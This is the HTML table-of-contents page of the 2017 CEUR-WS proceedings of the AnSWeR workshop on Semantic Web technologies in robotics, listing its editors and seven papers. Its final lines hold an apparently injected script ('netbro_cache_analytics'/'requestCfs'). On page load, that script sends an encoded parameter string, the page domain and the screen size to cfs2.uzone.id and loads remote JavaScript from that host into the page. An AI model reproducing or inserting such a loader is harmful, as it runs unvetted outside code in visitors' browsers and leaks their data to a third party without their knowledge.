
<!DOCTYPE html>
<!-- CEURVERSION=2015-12-02 -->
<html lang="en">
<head>
<meta http-equiv="Content-type" content="text/html;charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" type="text/css" href="../ceur-ws.css">
<title>CEUR-WS.org/Vol-1935 - Workshop on Application of Semantic Web technologies in Robotics 2017</title>
</head>
<!--CEURLANG=eng -->
<body>

<table style="border: 0; border-spacing: 0; border-collapse: collapse; width: 95%">
<tbody><tr>
<td style="text-align: left; vertical-align: middle">
<a href="http://ceur-ws.org/"><div id="CEURWSLOGO"></div></a>
</td>
<td style="text-align: right; vertical-align: middle">

<span class="CEURVOLNR">Vol-1935</span> <br>
<span class="CEURURN">urn:nbn:de:0074-1935-3</span>
<p class="unobtrusive copyright" style="text-align: justify">Copyright &copy; 
<span class="CEURPUBYEAR">2017</span> for the individual papers
by the papers' authors. Copying permitted for private and academic purposes.
This volume is published and copyrighted by its editors.</p>
</td>
</tr>
</tbody></table>

<hr>

<br><br><br>

<h1><span class="CEURVOLACRONYM">AnSWeR 2017</span><br>
<span class="CEURVOLTITLE">Application of Semantic Web technologies in Robotics</span></h1>
<br>

<h3>
<span class="CEURFULLTITLE">Proceedings of the 1st International Workshop on Application of Semantic Web technologies in Robotics</span><br>

co-located with 14th Extended Semantic Web Conference (<span class="CEURCOLOCATED">ESWC 2017</span>)<br>
</h3>
<h3><span class="CEURLOCTIME">Portoroz, Slovenia, May 29th, 2017</span>.</h3> 
<br>
<b> Edited by </b>
<p>

</p><h3>
   <a href="http://kmi.open.ac.uk/people/member/emanuele-bastianelli"><span class="CEURVOLEDITOR">Emanuele Bastianelli</span></a> *<br>
   <a href="https://www.insight-centre.org/users/mathieu-daquin"><span class="CEURVOLEDITOR">Mathieu d'Aquin</span></a> **<br>
   <a href="http://www.dis.uniroma1.it/~nardi/"><span class="CEURVOLEDITOR">Daniele Nardi</span></a> ***<br>

</h3>

* <a href="http://kmi.open.ac.uk/">Knowledge Media Institute</a>,
  The Open University, UK<br>
** <a href="https://www.insight-centre.org/">Insight Centre for Data Analytics</a>,
   , National University of Ireland Galway, Republic of Ireland <br>
*** <a href="https://www.dis.uniroma1.it/en">Department of Computer Science, Control and Management
Engineering</a>,
   Sapienza University of Rome, Italy<br>
  <br>

<hr>

<br><br><br>

<div class="CEURTOC">
<h2> Table of Contents </h2>

<ul>
<li id="preface">
<A href="preface.pdf">Preface</A><BR><BR>
</li>
</ul>

<h3><span class="CEURSESSION">Session 1: Long Papers</span></h3>

<ul>

<li id="paper-01"><a href="paper-01.pdf">
<span class="CEURTITLE">Frame Instance Extraction and Clustering for Default Knowledge Building</span></a>
<span class="CEURPAGES">1-10</span> <br>
<span class="CEURAUTHOR">Avijit Shah</span>, <span class="CEURAUTHOR">Valerio Basile</span>, <span class="CEURAUTHOR">Elena Cabrio</span>, <span class="CEURAUTHOR">Sowmya Kamath S.</span>
</li>

<li id="paper-02"><a href="paper-02.pdf">
<span class="CEURTITLE">Exploiting Context and Semantics for UAV Path-finding in an Urban Setting</span></a>
<span class="CEURPAGES">11-20</span> <br>
<span class="CEURAUTHOR">Marjan Alirezaieh</span>, <span class="CEURAUTHOR">Andrey Kiselev</span>, <span class="CEURAUTHOR">Franziska Kl&uuml;gl</span>, <span class="CEURAUTHOR">Martin L&auml;ngkvist</span>, <span class="CEURAUTHOR">Amy Loutfi</span>
</li>

<li id="paper-03"><a href="paper-03.pdf">
<span class="CEURTITLE">Personalized Robotic Intervention Strategy by Using Semantics for People with Dementia in Nursing Homes</span></a>
<span class="CEURPAGES">21-30</span> <br>
<span class="CEURAUTHOR">Femke Ongenae</span>, <span class="CEURAUTHOR">Femke De Backere</span>, <span class="CEURAUTHOR">Christof Mahieu</span>, <span class="CEURAUTHOR">Stijn De Pestel</span>, <span class="CEURAUTHOR">Jelle Nelis</span>, <span class="CEURAUTHOR">Pieter Simoens</span>, <span class="CEURAUTHOR">Filip De Turck</span>
</li>

<li id="paper-04"><a href="paper-04.pdf">
<span class="CEURTITLE">Making Sense of Indoor Spaces Using Semantic Web Mining and Situated Robot Perception</span></a>
<span class="CEURPAGES">31-40</span> <br>
<span class="CEURAUTHOR">Jay Young</span>, <span class="CEURAUTHOR">Valerio Basile</span>, <span class="CEURAUTHOR">Markus Suchi</span>, <span class="CEURAUTHOR">Lars Kunze</span>, <span class="CEURAUTHOR">Nick Hawes</span>, <span class="CEURAUTHOR">Markus Vincze</span>, <span class="CEURAUTHOR">Barbara Caputo</span>
</li>

</ul>


<h3><span class="CEURSESSION">Session 2: Short Papers and Demos </span></h3>

<ul>
<li id="paper-05"><a href="paper-05.pdf">
<span class="CEURTITLE">Autonomous Comprehensive Geriatric Assessment</span></a>
<span class="CEURPAGES">41-45</span> <br>
<span class="CEURAUTHOR">Luigi Asprino</span>, <span class="CEURAUTHOR">Aldo Gangemi</span>, <span class="CEURAUTHOR">Andrea Giovanni Nuzzolese</span>, <span class="CEURAUTHOR">Valentina Presutti</span>, <span class="CEURAUTHOR">Diego Reforgiato Recupero</span>, <span class="CEURAUTHOR">Alessandro Russo</span>
</li>

<li id="paper-06"><a href="paper-06.pdf">
<span class="CEURTITLE">A Knowledge Management System for Assistive Robotics</span></a>
<span class="CEURPAGES">46-50</span> <br>
<span class="CEURAUTHOR">Luigi Asprino</span>, <span class="CEURAUTHOR">Aldo Gangemi</span>, <span class="CEURAUTHOR">Andrea Giovanni Nuzzolese</span>, <span class="CEURAUTHOR">Valentina Presutti</span>, <span class="CEURAUTHOR">Alessandro Russo</span>
</li>

<li id="paper-07"><a href="paper-07.pdf">
<span class="CEURTITLE">Knowledge-driven Support for Reminiscence on Companion Robots</span></a>
<span class="CEURPAGES">51-55</span> <br>
<span class="CEURAUTHOR">Luigi Asprino</span>, <span class="CEURAUTHOR">Aldo Gangemi</span>, <span class="CEURAUTHOR">Andrea Giovanni Nuzzolese</span>, <span class="CEURAUTHOR">Valentina Presutti</span>, <span class="CEURAUTHOR">Alessandro Russo</span>
</li>

</ul>

<p>We offer a <a href="answer2017.bib">BibTeX file</a> for citing papers of this workshop from LaTeX.</p>

</div>


<hr>
<span class="unobtrusive">
2017-09-22: submitted by Emanuele Bastianelli, 
            metadata incl. bibliographic data published under <A HREF="http://creativecommons.org/publicdomain/zero/1.0/">Creative Commons CC0</A><br>
<span class="CEURPUBDATE">2017-09-23</span>: published on CEUR-WS.org 
	|<A HREF="https://validator.w3.org/nu/?doc=http%3A%2F%2Fceur-ws.org%2FVol-1935%2F">valid HTML5</A>|
</span>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKplEnpU1NJ3P3w8R66ZnvnhOvE3J1kHkBWTvZtGuKfwJ77u1bETROsu%2fJdPzG1dcFLq6v9tGPoW7aNNhx3SZmSoeKjgxsD52%2bpdvMOCFOtPh1uQ%2bPGlhPu%2bxr4SKxBzcWD%2b%2fHE53Ny547ZnXXp5kPUf5dChRPMPGmcJPsyChqi9a1jwbjMEAL7fdk8HIbgL3DMTgOkgpct2IF2LHsJrw6kY9o35I4t4rn5qvL3htv2SAE1byI4LxBBLS0K4qvC2z%2fePpCUvB44WePzIvKGluRzHrTaZr62KFm5yAtOM2U5xzJ6DDuV09pVdfF0fBfAdIviWHJIccIh469iSKXU8AC3Otrf1KRKfocUEajwGOjRkFgyBdpmOUA8XZow3lLV74Wh85wZHkbHkSHdkFjF9GPyngLf10ostXDcwHN77SdzYHDpHaMEJum1t9ssuBwGx9o" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body></html>

